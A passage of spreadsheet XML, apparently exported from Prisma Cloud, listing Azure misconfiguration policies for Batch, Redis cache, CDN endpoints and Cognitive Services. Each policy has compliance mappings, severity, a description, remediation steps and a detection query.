          <t>risk</t>
        </is>
      </c>
      <c r="AG22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5" t="inlineStr">
        <is>
          <t>ea27ffec-c8ba-4dbb-95e4-159b5350c94f</t>
        </is>
      </c>
      <c r="AI2225" t="inlineStr">
        <is>
          <t>5e1ba43e-121a-4e71-b5e6-d8f8091fe7cd</t>
        </is>
      </c>
      <c r="AJ2225" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2225" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2226">
      <c r="A2226" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, NIST SP 800-171 Revision 3, TX-RAMP Level 1, Microsoft Cloud Security Benchmark v1, Secure Controls Framework (SCF) - 2022.2.1, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, Sarbanes Oxley Act (SOX), Sarbanes Oxley Act (SOX), TX-RAMP Level 2, MLPS 2.0 (Level 2), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ITSG-33, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ITSG-33, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B2226" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2226" s="2" t="inlineStr"/>
      <c r="D2226" t="inlineStr"/>
      <c r="E2226" t="inlineStr"/>
      <c r="F2226" t="inlineStr"/>
      <c r="G2226" t="b">
        <v>1</v>
      </c>
      <c r="H22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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2226" t="inlineStr">
        <is>
          <t>azure-batch-account</t>
        </is>
      </c>
      <c r="K2226" t="inlineStr">
        <is>
          <t>Azure Batch account is not configured with managed identity</t>
        </is>
      </c>
      <c r="L2226" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2226" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2226" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2226" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2226" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2226" t="inlineStr">
        <is>
          <t>Principle 6</t>
        </is>
      </c>
      <c r="R2226" t="inlineStr">
        <is>
          <t>6.2.5</t>
        </is>
      </c>
      <c r="S2226" t="inlineStr"/>
      <c r="T2226" t="b">
        <v>0</v>
      </c>
      <c r="U2226" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2226" t="inlineStr">
        <is>
          <t>azure-batch-account</t>
        </is>
      </c>
      <c r="W2226" t="inlineStr">
        <is>
          <t>This policy identifies Batch accounts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Batch account.</t>
        </is>
      </c>
      <c r="X2226" t="inlineStr">
        <is>
          <t>1. Login to Azure portal.
2. Navigate to 'Batch accounts'
3. Click on the reported Batch account
4. Select 'Identity' under 'Settings' from left panel 
5. Configure either 'System assigned' or 'User assigned' identity
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2226" t="inlineStr"/>
      <c r="Z2226" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-batch-account' AND json.rule = properties.provisioningState equal ignore case Succeeded and identity does not exist or identity.type equal ignore case "None"</t>
        </is>
      </c>
      <c r="AA2226" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2226" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2226" t="inlineStr">
        <is>
          <t>PC-AZR-ABT-911</t>
        </is>
      </c>
      <c r="AD2226" t="b">
        <v>1</v>
      </c>
      <c r="AE2226" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2226" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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6" t="inlineStr">
        <is>
          <t>ee0552eb-431d-44b5-9ff9-08ee7eec8b40</t>
        </is>
      </c>
      <c r="AI2226" t="inlineStr">
        <is>
          <t>af9979d2-93b1-49b9-bf0a-26194866bfe7</t>
        </is>
      </c>
      <c r="AJ2226" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2226" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2227">
      <c r="A2227" t="inlineStr">
        <is>
          <t>HIPAA, ISO/IEC 27001:2022, Insurance Regulatory And Development Authority Of India, NYDFS 23 CRR-NY 500.0, ITSG-33, HITRUST CSF v.11.2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Telecommunications Security Act - TSA, CRI Profile v2.0, SOC 2, Telecommunications Security Act - TSA, DORA, NIST SP 800-171 Revision 3, Microsoft Cloud Security Benchmark v1, NIST CSF v2.0, SOC 2, HIPAA, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2227" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2227" s="2" t="inlineStr"/>
      <c r="D2227" t="inlineStr"/>
      <c r="E2227" t="inlineStr"/>
      <c r="F2227" t="inlineStr"/>
      <c r="G2227" t="b">
        <v>1</v>
      </c>
      <c r="H22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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2227" t="inlineStr">
        <is>
          <t>azure-cache-redis</t>
        </is>
      </c>
      <c r="K2227" t="inlineStr">
        <is>
          <t>Azure Cache for Redis not configured with data in transit encryption</t>
        </is>
      </c>
      <c r="L2227" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2227" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2227" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2227" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2227" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2227" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2227" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2227" t="inlineStr"/>
      <c r="T2227" t="b">
        <v>0</v>
      </c>
      <c r="U2227" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2227" t="inlineStr">
        <is>
          <t>azure-cache-redis</t>
        </is>
      </c>
      <c r="W2227" t="inlineStr">
        <is>
          <t>This policy identifies Azure Cache for Redis which are not configured with data encryption in transit. Enforcing an SSL connection helps prevent unauthorized users from reading sensitive data that is intercepted as it travels through the network, between clients/applications and cache servers, known as data in transit. It is recommended to configure in-transit encryption for Azure Cache for Redis.
Refer to below link for more details:
https://learn.microsoft.com/en-us/azure/azure-cache-for-redis/cache-configure#access-ports</t>
        </is>
      </c>
      <c r="X2227" t="inlineStr">
        <is>
          <t>To configure data in-transit for your existing Azure Cache for Redis follow below URL:
https://learn.microsoft.com/en-us/azure/azure-cache-for-redis/cache-configure#access-ports</t>
        </is>
      </c>
      <c r="Y2227" t="inlineStr"/>
      <c r="Z2227" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-cache-redis' AND json.rule = properties.provisioningState equal ignore case Succeeded and properties.enableNonSslPort is true</t>
        </is>
      </c>
      <c r="AA2227" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2227" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2227" t="inlineStr">
        <is>
          <t>PC-AZR-CAC-1065</t>
        </is>
      </c>
      <c r="AD2227" t="b">
        <v>1</v>
      </c>
      <c r="AE2227" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2227" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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7" t="inlineStr">
        <is>
          <t>cd393525-2d67-4b12-98f6-c4f11b1c1882</t>
        </is>
      </c>
      <c r="AI2227" t="inlineStr">
        <is>
          <t>9440c692-5df0-4db7-b896-215b846071ef</t>
        </is>
      </c>
      <c r="AJ2227" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2227" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2228">
      <c r="A2228" t="inlineStr">
        <is>
          <t>HIPAA, CIS Controls v8, ISO/IEC 27001:2022, CSA CCM v.4.0.1, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v.4.0.6, NIST SP 800-172, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ISO 27002:2022, New Zealand Information Security Manual (NZISM v3.4), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27002:2013, NIST CSF, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, CSA CCM v4.0.12, CIS Controls v7.1, CSA CCM v.4.0.6, MITRE ATT&amp;CK v12, Copy of New Zealand Information Security Manual (NZISM v3.4), ACSC Information Security Manual (ISM), CSA CCM v.4.0.6, ISO 27002:2022, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27017:2015, ISO/IEC 27001:2022, Matt's ATT&amp;ACK, ISO/IEC 27017:2015, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v4.0.12, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), Microsoft Cloud Security Benchmark v1, FFIEC, ISO/IEC 27018:2019, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), RBI Baseline Cyber Security and Resilience Requirements, NIST CSF, kfirdaus AWS Account-CS, CSA CCM v.4.0.6, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27001:2022, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CIS Controls v8.1, PCI DSS v4.0, ISO/IEC 27002:2013, ISO 27002:2022, CSA CCM v.4.0.1, Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2228" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2228" s="2" t="inlineStr"/>
      <c r="D2228" t="inlineStr"/>
      <c r="E2228" t="inlineStr"/>
      <c r="F2228" t="inlineStr"/>
      <c r="G2228" t="b">
        <v>1</v>
      </c>
      <c r="H22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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2228" t="inlineStr">
        <is>
          <t>azure-cdn-endpoint</t>
        </is>
      </c>
      <c r="K2228" t="inlineStr">
        <is>
          <t>Azure CDN Endpoint Custom domains using insecure TLS version</t>
        </is>
      </c>
      <c r="L2228" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2228" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2228" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2228" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2228" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2228" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2228" t="inlineStr">
        <is>
          <t>ISM-1139</t>
        </is>
      </c>
      <c r="S2228" t="inlineStr"/>
      <c r="T2228" t="b">
        <v>0</v>
      </c>
      <c r="U2228" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2228" t="inlineStr">
        <is>
          <t>azure-cdn-endpoint</t>
        </is>
      </c>
      <c r="W2228" t="inlineStr">
        <is>
          <t>This policy identifies Azure CDN Endpoint Custom domains which has insecure TLS version. TLS 1.2 resolves the security gap from its preceding versions. As a best security practice, use TLS 1.2 as the minimum TLS version for Azure CDN Endpoint Custom domains.</t>
        </is>
      </c>
      <c r="X2228" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Go to 'CDN profiles'
3. Choose the reported each 'CDN Endpoints' under each 'CDN profiles'
4. Under 'Settings' section, Click on 'Custom domains'
5. Select the 'Custom domain' for which you need to set TLS version
6. Under 'Configure' select 'TLS 1.2' for 'Minimum TLS version'
7. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2228" t="inlineStr"/>
      <c r="Z2228" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-cdn-endpoint' AND json.rule = properties.customDomains[?any( properties.customHttpsProvisioningState equals Enabled and properties.customHttpsParameters.minimumTlsVersion equals TLS10 )] exists</t>
        </is>
      </c>
      <c r="AA2228" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2228" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2228" t="inlineStr">
        <is>
          <t>PC-AZR-CDN-674</t>
        </is>
      </c>
      <c r="AD2228" t="b">
        <v>1</v>
      </c>
      <c r="AE2228" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2228" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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8" t="inlineStr">
        <is>
          <t>05e681af-c953-4490-97f0-bb444750f89f</t>
        </is>
      </c>
      <c r="AI2228" t="inlineStr">
        <is>
          <t>25076c90-2c43-4008-9f5f-c1fa422f44ec</t>
        </is>
      </c>
      <c r="AJ2228" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2228" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2229">
      <c r="A2229" t="inlineStr">
        <is>
          <t>HIPAA, CIS Controls v8, ISO/IEC 27001:2022, CSA CCM v.4.0.1, ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v.4.0.6, ISO 27002:2022, NIST SP 800-172, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, CSA CCM v4.0.12, CIS Controls v7.1, CSA CCM v.4.0.6, Copy of New Zealand Information Security Manual (NZISM v3.4), CSA CCM v.4.0.6, ISO 27002:2022, ISO/IEC 27017:2015, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, DORA, ISO/IEC 27002:2013, TX-RAMP Level 2, CSA CCM v4.0.12, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, Microsoft Cloud Security Benchmark v1, FFIEC, ISO/IEC 27018:2019, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), RBI Baseline Cyber Security and Resilience Requirements, SOC 2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.6, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27001:2022, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, ISO 27002:2022, CSA CCM v.4.0.1, NIST SP 800-172</t>
        </is>
      </c>
      <c r="B2229" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2229" s="2" t="inlineStr"/>
      <c r="D2229" t="inlineStr"/>
      <c r="E2229" t="inlineStr"/>
      <c r="F2229" t="inlineStr"/>
      <c r="G2229" t="b">
        <v>1</v>
      </c>
      <c r="H22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29" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2229" t="inlineStr">
        <is>
          <t>azure-cdn-endpoint</t>
        </is>
      </c>
      <c r="K2229" t="inlineStr">
        <is>
          <t>Azure CDN Endpoint Custom domains is not configured with HTTPS</t>
        </is>
      </c>
      <c r="L2229" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2229" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2229" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2229" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2229" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2229" t="inlineStr">
        <is>
          <t>Guidelines for Software Development</t>
        </is>
      </c>
      <c r="R2229" t="inlineStr">
        <is>
          <t>ISM-1552</t>
        </is>
      </c>
      <c r="S2229" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2229" t="b">
        <v>0</v>
      </c>
      <c r="U2229" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2229" t="inlineStr">
        <is>
          <t>azure-cdn-endpoint</t>
        </is>
      </c>
      <c r="W2229" t="inlineStr">
        <is>
          <t>This policy identifies Azure CDN Endpoint Custom domains which has not configured with HTTPS. Enabling HTTPS would allow sensitive data to be delivered securely via TLS/SSL encryption when it is sent across the internet. It is recommended to enable HTTPS in Azure CDN Endpoint Custom domains which will provide additional security and protects your web applications from attacks.</t>
        </is>
      </c>
      <c r="X2229" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Go to 'CDN profiles'
3. Choose the reported each 'CDN Endpoints' under each 'CDN profiles'
4. Under 'Settings' section, Click on 'Custom domains'
5. Select the 'Custom domain' for which you need to enable HTTPS
6. Under 'Configure' select 'On' for 'Custom domain HTTPS'
7. Select 'Certificate management type' and 'Minimum TLS version'
8. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-networking-policies/azr-networking-198
IaC: Refer the documentation for more details,
https://docs.paloaltonetworks.com/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-networking-policies/azr-networking-198</t>
        </is>
      </c>
      <c r="Y2229" t="inlineStr"/>
      <c r="Z2229" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-cdn-endpoint' AND json.rule = properties.customDomains[?any( properties.customHttpsProvisioningState does not equal Enabled )] exists
{"category":"Networking","resourceTypes":["azurerm_cdn_endpoint"]}</t>
        </is>
      </c>
      <c r="AA2229" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2229" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2229" t="inlineStr">
        <is>
          <t>PC-AZR-CDN-673-CKV_AZURE_198</t>
        </is>
      </c>
      <c r="AD2229" t="b">
        <v>1</v>
      </c>
      <c r="AE2229" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2229" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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29" t="inlineStr">
        <is>
          <t>45940bfa-ea53-4093-91a7-9bf18314fb48</t>
        </is>
      </c>
      <c r="AI2229" t="inlineStr">
        <is>
          <t>037748a3-155b-4fca-b286-5fa6a4f07dc9</t>
        </is>
      </c>
      <c r="AJ2229" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2229" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2230">
      <c r="A2230" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2230" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2230" s="2" t="inlineStr"/>
      <c r="D2230" t="inlineStr"/>
      <c r="E2230" t="inlineStr"/>
      <c r="F2230" t="inlineStr"/>
      <c r="G2230" t="b">
        <v>1</v>
      </c>
      <c r="H22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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2230" t="inlineStr">
        <is>
          <t>azure-cognitive-services</t>
        </is>
      </c>
      <c r="K2230" t="inlineStr">
        <is>
          <t>Azure Cognitive Services account is not configured with managed identity</t>
        </is>
      </c>
      <c r="L2230" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2230" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2230" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2230" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2230" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2230" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R2230" t="inlineStr">
        <is>
          <t>IM-3</t>
        </is>
      </c>
      <c r="S2230" t="inlineStr"/>
      <c r="T2230" t="b">
        <v>0</v>
      </c>
      <c r="U2230" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2230" t="inlineStr">
        <is>
          <t>azure-cognitive-services-account</t>
        </is>
      </c>
      <c r="W2230" t="inlineStr">
        <is>
          <t>This policy identifies Azure Cognitive Services accounts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Cognitive Services account.</t>
        </is>
      </c>
      <c r="X2230" t="inlineStr">
        <is>
          <t>1. Login to Azure portal
2. Navigate to 'Azure AI services'
3. Click on the reported Azure AI service
4. Select 'Identity' under 'Resource Management' from left panel
5. Configure either System assigned or User assigned identity
6. Click on Save</t>
        </is>
      </c>
      <c r="Y2230" t="inlineStr"/>
      <c r="Z2230" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-cognitive-services-account' AND json.rule = properties.provisioningState equal ignore case Succeeded and (identity.type does not exist or identity.type equal ignore case None)</t>
        </is>
      </c>
      <c r="AA2230" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2230" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2230" t="inlineStr">
        <is>
          <t>PC-AZR-ACS-1087</t>
        </is>
      </c>
      <c r="AD2230" t="b">
        <v>1</v>
      </c>
      <c r="AE2230" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2230" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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0" t="inlineStr">
        <is>
          <t>f5e91b59-9b0f-4c6d-85d8-be5eeadbbdb3</t>
        </is>
      </c>
      <c r="AI2230" t="inlineStr">
        <is>
          <t>31a53a05-29dd-4681-9d5e-94009e8ce9c6</t>
        </is>
      </c>
      <c r="AJ2230" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2230" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2231">
      <c r="A2231" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, HIPAA, ISO/IEC 27001:2022, HITRUST CSF v.11.2.0, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, SOC 2, SOC 2, TX-RAMP Level 1, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B2231" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2231" s="2" t="inlineStr"/>
      <c r="D2231" t="inlineStr"/>
      <c r="E2231" t="inlineStr"/>
      <c r="F2231" t="inlineStr"/>
      <c r="G2231" t="b">
        <v>0</v>
      </c>
      <c r="H22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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2231" t="inlineStr">
        <is>
          <t>azure-cognitive-services</t>
        </is>
      </c>
      <c r="K2231" t="inlineStr">
        <is>
          <t>Azure Cognitive Services account configured with public network access</t>
        </is>
      </c>
      <c r="L2231" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2231" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2231" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2231" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2231" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2231" t="inlineStr">
        <is>
          <t>Organisational Controls</t>
        </is>
      </c>
      <c r="R2231" t="inlineStr">
        <is>
          <t>A5.15</t>
        </is>
      </c>
      <c r="S2231" t="inlineStr"/>
      <c r="T2231" t="b">
        <v>0</v>
      </c>
      <c r="U2231" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2231" t="inlineStr">
        <is>
          <t>azure-cognitive-services-account</t>
        </is>
      </c>
      <c r="W2231" t="inlineStr">
        <is>
          <t>This policy identifies Azure Cognitive Services accounts configured with public network access. Overly permissive public network access allows access to resource through the internet using a public IP address. It is recommended to restrict IP ranges to allow access to your cognitive Services account and endpoint from specific public internet IP address ranges and is accessible only to restricted entities.</t>
        </is>
      </c>
      <c r="X2231" t="inlineStr">
        <is>
          <t>To restirct internet IP ranges on your existing Cognitive Services account, follow the below URL:
https://learn.microsoft.com/en-us/azure/ai-services/cognitive-services-virtual-networks?tabs=portal 
Build Recommendation: Refer the documentation for more details,
https://docs.paloaltonetworks.com/content/techdocs/en_US/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-networking-policies/ensure-azure-cognitive-services-accounts-disable-public-network-access.html
IaC: Refer the documentation for more details,
https://docs.paloaltonetworks.com/content/techdocs/en_US/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/azure-policies/azure-networking-policies/ensure-azure-cognitive-services-accounts-disable-public-network-access.html</t>
        </is>
      </c>
      <c r="Y2231" t="inlineStr"/>
      <c r="Z2231" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-cognitive-services-account' AND json.rule = properties.provisioningState equal ignore case Succeeded and properties.publicNetworkAccess equal ignore case Enabled and (properties.networkAcls.defaultAction does not exist or properties.networkAcls.defaultAction equal ignore case Allow)
{"category":"Networking","resourceTypes":["azurerm_cognitive_account"]}</t>
        </is>
      </c>
      <c r="AA2231" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB2231" t="inlineStr">
        <is>
          <t>2024-11-13 23:45:52</t>
        </is>
      </c>
      <c r="AC2231" t="inlineStr">
        <is>
          <t>PC-AZR-ACS-1084-CKV_AZURE_134</t>
        </is>
      </c>
      <c r="AD2231" t="b">
        <v>1</v>
      </c>
      <c r="AE2231" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2231" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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1" t="inlineStr">
        <is>
          <t>65cc30f0-f49c-4d12-a025-8390dc634b08</t>
        </is>
      </c>
      <c r="AI2231" t="inlineStr">
        <is>
          <t>30f9ba6b-a3bf-49e9-bada-25d695309b31</t>
        </is>
      </c>
      <c r="AJ2231" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2231" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2232">
      <c r="A2232" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2232" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2232" s="2" t="inlineStr"/>
      <c r="D2232" t="n">
        <v>0</v>
      </c>
      <c r="E2232" t="n">
        <v>7</v>
      </c>
      <c r="F2232" t="n">
        <v>0</v>
      </c>
      <c r="G2232" t="b">
        <v>1</v>
